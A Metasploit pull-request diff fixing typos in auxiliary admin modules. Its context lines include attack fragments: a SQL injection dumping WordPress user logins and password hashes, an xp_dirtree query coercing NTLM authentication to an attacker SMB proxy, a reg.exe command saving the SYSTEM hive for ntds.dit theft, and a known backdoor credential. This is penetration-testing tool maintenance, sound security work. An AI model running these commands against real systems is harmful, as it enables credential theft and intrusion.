Land #18679, Aux modules spelling

modules/auxiliary/admin/aws/aws_launch_instances.rb

@@ -85,7 +85,7 @@ def run
     begin
       # need a better parser so we can avoid shit like this
       ip = doc['reservationSet']['item']['instancesSet']['item']['networkInterfaceSet']['item']['privateIpAddressesSet']['item']['association']['publicIp']
-      print_status("Instance #{instance_id} has IP adrress #{ip}")
+      print_status("Instance #{instance_id} has IP address #{ip}")
     rescue NoMethodError
       print_error("Could not retrieve instance IP address")
     end
@@ -150,15 +150,15 @@ def create_keypair(creds)
     if doc['Response'].nil?
       doc = print_results(doc, action)
       if doc['keyName'].nil? || doc['keyFingerprint'].nil?
-        print_error("Error creating key using privided key material (SSH_PUB_KEY)")
+        print_error("Error creating key using provided key material (SSH_PUB_KEY)")
       else
         print_status("Created #{doc['keyName']} (#{doc['keyFingerprint']})")
       end
     else
       if doc['Response']['Errors'] && doc['Response']['Errors']['Error']
         print_error(doc['Response']['Errors']['Error']['Message'])
       else
-        print_error("Error creating key using privided key material (SSH_PUB_KEY)")
+        print_error("Error creating key using provided key material (SSH_PUB_KEY)")
       end
     end
   end

modules/auxiliary/admin/backupexec/dump.rb

@@ -174,7 +174,7 @@ def run
     end
 
     #
-    # Define our tranfer parameters
+    # Define our transfer parameters
     #
     xenv =
     [

modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb

@@ -110,11 +110,11 @@ def build_ns_kek
     f1_hex = File.binread(ns_kek_f1)
     f2_hex = File.binread(ns_kek_f2)
     unless f1_hex.match?(/^[0-9a-f]+$/i)
-      print_error('Provided F1.key is not valid hexidecimal data')
+      print_error('Provided F1.key is not valid hexadecimal data')
       raise Msf::OptionValidateError, ['NS_KEK_F1']
     end
     unless f2_hex.match?(/^[0-9a-f]+$/i)
-      print_error('Provided F2.key is not valid hexidecimal data')
+      print_error('Provided F2.key is not valid hexadecimal data')
       raise Msf::OptionValidateError, ['NS_KEK_F2']
     end
     f1_key = f1_hex[66..130].scan(/../).map(&:hex).pack('C*')
@@ -152,7 +152,7 @@ def parse_ns_config
           end
           print_status("Config line:\n#{config_entry}")
           if is_kek && !@ns_kek_key
-            print_warning('Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible')
+            print_warning('Entry was encrypted with KEK but no KEK fragment files provided, decryption will not be possible')
             next
           end
           username = parse_username_from_config(config_entry)

modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb

@@ -43,7 +43,7 @@ def initialize(info = {})
         'References' => [
           [ 'CVE', '2015-0964' ], # XSS vulnerability
           [ 'CVE', '2015-0965' ], # CSRF vulnerability
-          [ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
+          [ 'CVE', '2015-0966' ], # "technician/yZgO8Bvj" web interface backdoor
           [ 'URL', 'https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ],
         ]
       )

modules/auxiliary/admin/http/contentkeeper_fileaccess.rb

@@ -31,7 +31,7 @@ def initialize
   end
 
   def run_host(_ip)
-    tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.
+    tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
 
     print_status("Attempting to connect to #{rhost}:#{rport}")
     res = send_request_raw(

modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb

@@ -52,7 +52,7 @@ def run
       if res.body =~ %r{<password>(.*)</password>}
         print_good("#{rhost}:#{rport} - credentials successfully extracted")
 
-        # store all details as loot -> there is some usefull stuff in the response
+        # store all details as loot -> there is some useful stuff in the response
         loot = store_loot('dlink.dir645.config', 'text/plain', rhost, res.body)
         print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}")
 

modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb

@@ -48,7 +48,7 @@ def run
           print_good("#{rhost}:#{rport} - Credentials successfully extracted")
         end
 
-        # store all details as loot -> there is some usefull stuff in the response
+        # store all details as loot -> there is some useful stuff in the response
         loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)
         print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
 

modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb

@@ -108,7 +108,7 @@ def check
     end
 
     if res.nil?
-      return Exploit::CheckCode::Unknown('No response recieved from the target!')
+      return Exploit::CheckCode::Unknown('No response received from the target!')
     elsif res && res.code == 200
       xml_res = res.get_xml_document
       print_status('Following users are available for password reset...')

modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb

@@ -55,7 +55,7 @@ def deploy_action(app_base, war_data)
       head_stager_uri = '/' + stager_base + '/' + head_stager_jsp_name + '.jsp'
       res = upload_file(stager_base, head_stager_jsp_name, head_stager_contents)
 
-      # We split the stager_jsp_code in multipe junks and transfer on the
+      # We split the stager_jsp_code in multiple junks and transfer on the
       # target with multiple requests
       current_pos = 0
       while current_pos < stager_contents.length
@@ -68,7 +68,7 @@ def deploy_action(app_base, war_data)
       end
     end
 
-    # Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
+    # Using HEAD may trigger a 500 Internal Server Error (at least on 4.2.3.GA),
     # but the file still gets written.
     unless res && (res.code == 200 || res.code == 500)
       fail_with(Failure::Unknown, 'Failed to deploy')

modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb

@@ -62,7 +62,7 @@ def run
       }
     })
 
-    # Yes, "sucess" is really mispelt, as is "Servelet" ... !
+    # Yes, "sucess" is really misspelt, as is "Servelet" ... !
     unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/
       print_error('Administrator account creation failed')
     end

modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb

@@ -27,7 +27,7 @@ def initialize(info = {})
         'Platform' => 'linux',
         'Author' => [
           'colorlight2019', # Vulnerability Discovery and Exploit Code
-          'SSD Disclosure', # Vulnerabilty Writeup
+          'SSD Disclosure', # Vulnerability Writeup
           'Grant Willcox (tekwizz123)' # Metasploit Module
         ],
         'DefaultTarget' => 0,

modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb

@@ -108,9 +108,9 @@ def run
       if res.nil? || res.body.nil?
         fail_with(Failure::UnexpectedReply, 'Unexpected reply while deleting the alias')
       elsif res.body =~ %r{<ul class="flash-error">.*<li.*#{target_alias}.*</li>.*</ul>}mi
-        fail_with(Failure::NotVulnerable, 'It seems the target is not vulerable, the deletion of the target alias failed.')
+        fail_with(Failure::NotVulnerable, 'It seems the target is not vulnerable, the deletion of the target alias failed.')
       else
-        fail_with(Failure::Unknown, 'An unexpected failure occured.')
+        fail_with(Failure::Unknown, 'An unexpected failure occurred.')
       end
     end
     print_good('Deleted the old alias')
@@ -130,7 +130,7 @@ def run
       elsif res.body =~ /<ul class="flash-error">/mi
         fail_with(Failure::UnexpectedReply, 'It seems the new alias couldn\'t be added.')
       else
-        fail_with(Failure::Unknown, 'An unexpected failure occured.')
+        fail_with(Failure::Unknown, 'An unexpected failure occurred.')
       end
     end
     print_good('New alias created')

modules/auxiliary/admin/http/tomcat_utf8_traversal.rb

@@ -38,7 +38,7 @@ def initialize
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'URI to the Tomcat instance', '/']),
         OptPath.new('SENSITIVE_FILES', [
-          true, 'File containing senstive files, one per line',
+          true, 'File containing sensitive files, one per line',
           File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files.txt')
         ]),
         OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),

modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb

@@ -11,7 +11,7 @@ def initialize
     super(
       'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
       'Description' => %q{
-        This module tests whether a directory traversal vulnerablity is present
+        This module tests whether a directory traversal vulnerability is present
         in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
         The vulnerability appears to be actually caused by the Tomcat UTF-8
         bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
@@ -38,7 +38,7 @@ def initialize
         Opt::RPORT(8443),
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptPath.new('SENSITIVE_FILES', [
-          true, 'File containing senstive files, one per line',
+          true, 'File containing sensitive files, one per line',
           File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files.txt')
         ]),
       ]

modules/auxiliary/admin/http/typo3_news_module_sqli.rb

@@ -83,7 +83,7 @@ def dump_the_hash(patterns = {})
   end
 
   def blind(field, table, condition, charset, digit_charset, patterns = {})
-    # Adding 9 so that the result has two digits, If the lenght is superior to 100-9 it won't work
+    # Adding 9 so that the result has two digits, If the length is superior to 100-9 it won't work
     offset = 9
     size = blind_size("length(#{field})+#{offset}",
                       table,
@@ -173,7 +173,7 @@ def try_autodetect_patterns
     end
 
     if pattern1.to_s.eql?('') || pattern2.to_s.eql?('')
-      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user speficied values...")
+      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user specified values...")
       pattern1 = datastore['PATTERN1']
       pattern2 = datastore['PATTERN2']
     end

modules/auxiliary/admin/http/typo3_sa_2009_001.rb

@@ -40,7 +40,7 @@ def enc_key(seed)
       final = datastore['ENC_KEY']
       print_status('Using provided Encryption Key')
     else
-      # build the encrption key to check
+      # build the encryption key to check
       seed = seed.to_s
       rnd1 = Digest::MD5.hexdigest(seed)
       rnd2 = Digest::MD5.hexdigest(rnd1)

modules/auxiliary/admin/http/wp_symposium_sql_injection.rb

@@ -85,7 +85,7 @@ def run
 
     credentials = ''
 
-    vprint_status("#{peer} - Trying to retrieve the users informations...")
+    vprint_status("#{peer} - Trying to retrieve the users information...")
     for user_id in first_id..last_id
       separator = Rex::Text.rand_text_numeric(7, bad = '0')
       user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")

modules/auxiliary/admin/misc/sercomm_dump_config.rb

@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
     ]
   }
 
-  attr_accessor :endianess
+  attr_accessor :endianness
   attr_accessor :credentials
 
   def initialize(info={})
@@ -61,12 +61,12 @@ def initialize(info={})
   end
 
   def run
-    print_status("Attempting to connect and check endianess...")
-    @endianess = fingerprint_endian
+    print_status("Attempting to connect and check endianness...")
+    @endianness = fingerprint_endian
     @credentials = {}
 
-    if endianess.nil?
-      print_error("Failed to check endianess, aborting...")
+    if endianness.nil?
+      print_error("Failed to check endianness, aborting...")
       return
     end
     print_good("#{string_endianess} device found...")
@@ -114,11 +114,11 @@ def report_cred(opts)
   private
 
   def little_endian?
-    return endianess == 'LE'
+    return endianness == 'LE'
   end
 
   def big_endian?
-    return endianess == 'BE'
+    return endianness == 'BE'
   end
 
   def string_endianess

modules/auxiliary/admin/mssql/mssql_findandsampledata.rb

@@ -55,7 +55,7 @@ def sql_statement()
 
     # DEFINE SEARCH QUERY AS VARIABLE
     sql = "
-    -- CHECK IF VERSION IS COMPATABLE = > than 2000
+    -- CHECK IF VERSION IS COMPATIBLE = > than 2000
     IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
     CHARINDEX('.',cast(SERVERPROPERTY('ProductVersion') as VARCHAR),1)-1)) > 0
     BEGIN
@@ -80,7 +80,7 @@ def sql_statement()
       DECLARE @SEARCH_TERMS varchar(800);
       SET @SEARCH_TERMS = ''; -- Leave this blank
 
-      -- START WHILE LOOP HERE -- BEGIN TO ITTERATE THROUGH KEYWORDS
+      -- START WHILE LOOP HERE -- BEGIN TO ITERATE THROUGH KEYWORDS
 
         WHILE LEN(@KEYWORDS) > 0
           BEGIN
@@ -101,7 +101,7 @@ def sql_statement()
             SET @KEYWORDS = SUBSTRING(@KEYWORDS,@change+1,LEN(@KEYWORDS));
 
           END
-        -- REMOVE UNEEDED
+        -- REMOVE UNNEEDED
         SELECT @SEARCH_TERMS = SUBSTRING(@SEARCH_TERMS,0,LEN(@SEARCH_TERMS)-2);
 
       --------------------------------------------------
@@ -370,7 +370,7 @@ def sql_statement()
       }
     return
     else
-      #SETUP COLUM WIDTH FOR QUERY RESULTS
+      #SETUP COLUMN WIDTH FOR QUERY RESULTS
       #Save loot status
       save_loot="yes"
       column_data.each { |row|

modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb

@@ -51,7 +51,7 @@ def run
     sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
     print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
 
-    # Execute query to force authentation from backend database to smbproxy
+    # Execute query to force authentication from backend database to smbproxy
     mssql_query(sql)
   end
 end

modules/auxiliary/admin/natpmp/natpmp_map.rb

@@ -19,7 +19,7 @@ def initialize
 
     register_options(
       [
-        OptString.new('EXTERNAL_PORTS', [true, 'The external ports to foward from (0 to let the target choose)', 0]),
+        OptString.new('EXTERNAL_PORTS', [true, 'The external ports to forward from (0 to let the target choose)', 0]),
         OptString.new('INTERNAL_PORTS', [true, 'The internal ports to forward to', '22,135-139,80,443,445'])
       ],
       self.class

modules/auxiliary/admin/netbios/netbios_spoof.rb

@@ -39,7 +39,7 @@ def initialize
   def netbios_spam
     payload =
         "\xff\xff"   + # TX ID (will brute force this)
-        "\x85\x00"   + # Flags = response + authoratative + recursion desired
+        "\x85\x00"   + # Flags = response + authoritative + recursion desired
         "\x00\x00"   + # Questions = 0
         "\x00\x01"   + # Answer RRs = 1
         "\x00\x00"   + # Authority RRs = 0

modules/auxiliary/admin/oracle/oraenum.rb

@@ -350,7 +350,7 @@ def run
         :sname => 'oracle',
         :port => datastore['RPORT'],
         :type => 'ORA_ENUM',
-        :data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}",
+        :data => "Password Maximum Reuse Time: #{passreusemax[0].chomp}",
         :update => :unique_data
       )
       print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")

modules/auxiliary/admin/postgres/postgres_readfile.rb

@@ -47,7 +47,7 @@ def run
         print_error "#{rhost}:#{rport} Postgres - No such file or directory."
         vprint_status "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
       when /^C42501/
-        print_error "#{rhost}:#{rport} Postgres - Insufficent file permissions."
+        print_error "#{rhost}:#{rport} Postgres - Insufficient file permissions."
         vprint_status "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
       else
         print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"

modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb

@@ -209,7 +209,7 @@ def analyze_first_response(html_response)
 
       # Check second HTTP response
       if second_response.nil? || second_response.code != 200 || !second_response.body.include?('area shape=rect')
-        return -2 # Reponse from second HTTP request was not what was expected!
+        return -2 # Response from second HTTP request was not what was expected!
       end
 
       get_file_content(second_response.body)

modules/auxiliary/admin/scada/multi_cip_command.rb

@@ -100,7 +100,7 @@ def req_session
         raise ::Rex::ConnectionTimeout
       end
     rescue ::Interrupt
-      print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotation")
+      print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotiation")
       raise $!
     rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e
       print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")

modules/auxiliary/admin/smb/psexec_ntdsgrab.rb

@@ -168,7 +168,7 @@ def check_ntds(text)
   # Copies the SYSTEM hive file to the Temp directory on the target host
   def copy_sys_hive
     begin
-      # Try to crate the sys hive copy
+      # Try to create the sys hive copy
       command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
       return psexec(command)
     rescue StandardError => hiveerror
@@ -190,7 +190,7 @@ def download_ntds(file)
       ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
       print_good("ntds.dit stored at #{ntds_path}")
     rescue StandardError => ntdsdownloaderror
-      print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
+      print_error("Unable to download ntds.dit: #{ntdsdownloaderror}")
       return ntdsdownloaderror
     end
     simple.disconnect("\\\\#{@ip}\\#{@smbshare}")

modules/auxiliary/admin/tftp/tftp_transfer_util.rb

@@ -50,7 +50,7 @@ def initialize
   end
 
   def mode
-    datastore['MODE'] || "octect"
+    datastore['MODE'] || "octet"
   end
 
   def remote_file
@@ -160,7 +160,7 @@ def run
     end
   end
 
-  # Run in case something untoward happend with the connection and the
+  # Run in case something untoward happened with the connection and the
   # client object didn't get stopped on its own. This can happen with
   # transfers that got interrupted or malformed (like sending a 0 byte
   # file).